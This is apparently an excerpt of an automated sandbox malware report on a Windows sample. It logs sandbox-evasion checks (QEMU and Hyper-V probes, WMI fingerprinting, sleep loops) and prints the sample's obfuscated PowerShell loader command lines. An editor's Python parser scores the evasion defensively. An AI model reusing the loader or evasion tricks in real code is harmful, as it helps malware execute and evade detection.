            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | File opened: C:\Program Files\qga\qga.exe
            Source: powershell.exe, 00000006.00000002.86777664245.0000000007280000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: powershell.exe, 00000006.00000002.86781234856.000000000734F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE,
            Source: Initial file | Initial file: do while timer-temp<sec
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3308 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3308 | Thread sleep time: -90000s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4272 | Thread sleep count: 685 > 30
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4272 | Thread sleep time: -342500s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3308 | Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Last function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.dll
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 9040
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Window / User API: threadDelayed 685
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Thread delayed: delay time: 30000
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | System information queried: ModuleInformation
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicshutdown
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V PowerShell Direct Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Time Synchronization Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicvss
            Source: CasPol.exe, 0000000C.00000002.91096675961.00000000014A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: CasPol.exe, 0000000C.00000002.91095102327.0000000001440000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
            Source: powershell.exe, 00000006.00000002.86781234856.000000000734F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe,
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Data Exchange Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Heartbeat Service
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Service Interface
            Source: powershell.exe, 00000006.00000002.86777664245.0000000007280000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicheartbeat
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 12_2_20496418 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Memory allocated: page read and write | page guard
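The rows above mix three kinds of anti-analysis behaviour: hardware fingerprinting through WMI (Win32_BaseBoard, Win32_NetworkAdapterConfiguration, Win32_Processor), explicit probes for the QEMU guest agent (qemu-ga.exe, qga.exe), and timing evasion (a 685-iteration sleep loop on TID 4272 plus a maximal sleep on TID 3308). The Hyper-V service names found in PowerShell memory are weak evidence on their own, because the vmic* integration services are registered on a stock Windows 10 install whether or not it runs under Hyper-V. The following Python is an added example by the editor, not part of the Joe Sandbox report: it parses these row formats, recovers the per-call sleep length (the report prints the figures with an "s" suffix, but they are consistent with milliseconds: 342500 / 685 = 500, and 922337203685477 is exactly (2^63 - 1) hundred-nanosecond ticks expressed in milliseconds, i.e. the largest relative wait NtDelayExecution can express, which can just as well be a runtime wait thread as a deliberate stall), and produces a weighted evasion score. The sample rows are copied from this section; the thresholds, weights and the artifact-to-hypervisor table are the example's own assumptions.

```python
import re
from collections import defaultdict

# Largest relative wait NtDelayExecution can express, in milliseconds:
# (2**63 - 1) hundred-nanosecond ticks // 10_000 == 922337203685477, the exact
# figure the report shows for TID 3308 (assumption: the report's figures are ms).
INT64_MAX_MS = (2**63 - 1) // 10_000

SLEEP_TIME = re.compile(r"TID:\s*(\d+)[\s|]*Thread sleep time:\s*-(\d+)s")
SLEEP_COUNT = re.compile(r"TID:\s*(\d+)[\s|]*Thread sleep count:\s*(\d+)")
WMI_CLASS = re.compile(r"root\\cimv2\s*:\s*(?:SELECT \* FROM )?(Win32_\w+)")
FILE_OPENED = re.compile(r"File opened:\s*(\S.*?)\s*$")
MEM_STRING = re.compile(r"Binary or memory string:\s*(\S.*?)\s*$")

# Editor's assumptions, not the report's: WMI classes typically read to
# fingerprint hardware, and substrings that identify a hypervisor family.
VM_WMI_CLASSES = {"Win32_BaseBoard", "Win32_Bios", "Win32_Processor",
                  "Win32_ComputerSystem", "Win32_NetworkAdapterConfiguration"}
VM_ARTIFACTS = {"qemu-ga": "QEMU/KVM", "qga": "QEMU/KVM",
                "hyper-v": "Hyper-V", "vmic": "Hyper-V"}

# Rows copied from the report section above.
SAMPLE_ROWS = [
    r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe",
    r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Program Files\qga\qga.exe",
    r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration",
    r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard",
    r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor",
    r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3308 | Thread sleep time: -922337203685477s >= -30000s",
    r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3308 | Thread sleep time: -90000s >= -30000s",
    r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4272 | Thread sleep count: 685 > 30",
    r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 4272 | Thread sleep time: -342500s >= -30000s",
    r"C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3308 | Thread sleep time: -30000s >= -30000s",
    r"powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V Guest Shutdown Service",
    r"powershell.exe, 00000006.00000002.86817086620.000000000ABB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmicshutdown",
    r"CasPol.exe, 0000000C.00000002.91096675961.00000000014A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW",
]


def classify_artifact(text):
    """Map a probed path or memory string to a hypervisor family, or None."""
    low = text.lower()
    return next((fam for needle, fam in VM_ARTIFACTS.items() if needle in low), None)


def analyze(rows):
    """Group report rows into per-thread sleep behaviour, WMI classes and VM artifacts."""
    sleeps = defaultdict(lambda: {"calls": 0, "total_ms": 0, "infinite_wait": False})
    wmi, artifacts = set(), defaultdict(set)
    for row in rows:
        if m := SLEEP_TIME.search(row):
            tid, ms = m.group(1), int(m.group(2))
            if ms >= INT64_MAX_MS:
                sleeps[tid]["infinite_wait"] = True
            else:
                sleeps[tid]["total_ms"] += ms
        elif m := SLEEP_COUNT.search(row):
            sleeps[m.group(1)]["calls"] = int(m.group(2))
        elif (m := WMI_CLASS.search(row)) and m.group(1) in VM_WMI_CLASSES:
            wmi.add(m.group(1))
        elif m := (FILE_OPENED.search(row) or MEM_STRING.search(row)):
            if fam := classify_artifact(m.group(1)):
                artifacts[fam].add(m.group(1))
    for s in sleeps.values():
        # The report sums sleep time per thread; dividing by the call count
        # recovers the per-iteration delay of a sleep loop.
        s["per_call_ms"] = s["total_ms"] // s["calls"] if s["calls"] else None
    return {"sleeps": dict(sleeps), "wmi": wmi,
            "artifacts": {k: sorted(v) for k, v in artifacts.items()}}


def score(report):
    """Weighted evasion score plus human-readable reasons (weights are assumptions)."""
    points, reasons = 0, []
    if report["wmi"]:
        points += 2
        reasons.append("hardware fingerprinting via WMI: " + ", ".join(sorted(report["wmi"])))
    if report["artifacts"].get("QEMU/KVM"):
        points += 3
        reasons.append("explicit probe for QEMU guest-agent paths")
    if report["artifacts"].get("Hyper-V"):
        points += 1  # weak: vmic* integration services exist on stock Windows 10
        reasons.append("Hyper-V service names in memory (weak, present on stock Windows)")
    for tid, s in report["sleeps"].items():
        if s["infinite_wait"]:
            points += 1  # may be a runtime wait thread rather than deliberate stalling
            reasons.append(f"TID {tid}: maximal sleep, effectively an infinite wait")
        if s["calls"] > 30 and s["per_call_ms"]:
            points += 3
            reasons.append(f"TID {tid}: {s['calls']} x {s['per_call_ms']} ms sleep loop "
                           f"(~{s['total_ms'] / 60000:.1f} min requested)")
    return points, reasons


if __name__ == "__main__":
    pts, why = score(analyze(SAMPLE_ROWS))
    print(f"evasion score {pts}")
    for r in why:
        print(" -", r)
```

The per-call figure is the useful one for tuning a sandbox: 685 calls of 500 ms is a little under six minutes of requested delay, which a sandbox that fast-forwards sleeps of 30 seconds or more would not shorten at all, because no single call exceeds the threshold.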
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$biliate = """laabrdgedga-sttdiycopsteun st-udthoyaupepewrdreetrfpaiusnumiretcoimaofrnsv sm'reusksunifuncogkn tosphyprsjatnuesimst;viusmsprisknangim prsplyeusgrtgueoemfo.rerpuuconhutsoifrmfreil.joifonsntsnelurcoopapjastrererelvkuiticreefesbr;ampupukobsnlvoidecaw sasrutrhajetaaitecsv brceslfoaunsvasle ebtinubaebaiourceokonpr1ci sh{ti[phdaflullbuimimhapmaoafreutan(ad`"""inuluskiekarme3br2si`"""rr)ri]gopmauflbstlmeitycsa aeskatinahjtsmisvcne stehoxattimeteropnna gribenbrtno yddmierestotenrbrostyovcspamermiecotkl(sn)me;sm[afdepllulreienmflprdoharegtbr(ov`"""migaldmeipl3in2er`"""te)ce]tapeuudrbculmaihjcas lgsudttrabrtsqiercco viebextetveetrrhrnma foibanartha stsbrcudagrllaeskwteiscnsudreobuwcrevexchtstesuxkn(noifinkutse modlnrigibefratpl,reiannaltju beaudmambmiupalheaap,diifonkntsp jubprasesvaoqu,mailenimtba noiafadagvrtpotsyaov,chigenpltre divsaetvjsimboasotan1un5fr8ud,giitinstter yemsucslgkursk)eg;ak[kuddilbulimirdmampanovarprtfr(sk`"""svksqerorpinflerelpa3ov2as`"""tr)wo]hepmeurobbalfrilucre hysmitfoaunttaitmcja anedexmitkuesarblnoi reifansutov drhdeestabapblsbeispzbaeko(stiunnditou ycpkerbrourpre,phisonxatcl aianodstrchefosov,viidenjutdi mutimowerartinrfripo)mo;co[sldoplsalspiapmunpreosjrrotko(wh`"""jgsschdiebilshlko3ge2re.vaduflomlun`"""st)un]beppauslboslbeiuncas masmntsyaletfritrcpr noevixratfoererwenun sevenofuitrdrh padterflafigmefciiennstikasbehmi(esibonsutpo opomumpldserge)ba;ej[spdfalbelmeilimhepfroudrgutau(je`"""mawskifantemnumin.apdkolbolfl`"""fu)ho]scpovuprbmdlviialcba bossatasahotliifocsi veenoxluthaebirjenla hoiennnatgu armtjihoxscedartrgswejotcodtrefivsuckeamipqussu(skiblncitch benpribrtserud,uditincotjo vafaseewlob,thivinquteo noaphfafsxi9im3bl)ta;ls[chdculcalhaipumcipicofarretsl(be`"""rekgletrrhinatesilek3sa2ur`"""ti)de]papfeudrbfolopilkctn busabtsyaudtmeisocfr 
coeimxfatmoefrrnanto trimentotal kaludoescaskqurosepasphoovuforjucapeph(roiafncotte velexesoiun)ir;un[redpiliwloyilammipshostrfatcr(bo`"""flkauecervantoejelav3pl2re`"""se)co]unpanucoboplfoilacla casrotopauntmuikacti wieknxentreeudrtrntr ariponintsl pivinistrpetrauacatilvaatelbelclothcfa(tristnsotwi gevgr1sk,smilunthtor cavbl2ne,keistncotby hevdr3pa,heiganuptku svvca4in)pr;py[drdmalinlpribrmhepploknrpttba(ho`"""craundbevalatopanicr3st2ph.wadbelsalci`"""to)un]stptiurebsylpuiencfo cosmotunaunthuiatcst meemixdotofeadrinnro suvbeoupividti cimtrabipbegateoensleglrpribrccomfiaunsankvn(saisknmetpe plbinrtriodnobkir,doidenqutru camchiuddtitknssn)in;ov[trdrelselfuiunmripgoosuromtsc(ve`"""brkvaemermanpeesklst3co2in`"""ef)ce]bepkoumybkollbicocun edsgatkuatetkoiaaclu noevexprtneeunranncy prisenlvtplpfotborkr scegansuumemfuschyfrspotbeeoomfjlguoflcsranelgaevosprwun(paudiieynsttpe grvex1ma,psihankoten kovgr2ha)et;om[oodrhldilflisumenpskoovrtrtsp(st`"""obkedeelrrentaedaldi3sc2di`"""si)ni]fopchutlbdalcaialcli smsnytvaaretprisuctr luebexgattregermanbr reigunentan unsgieunttiten
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr 
CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP"
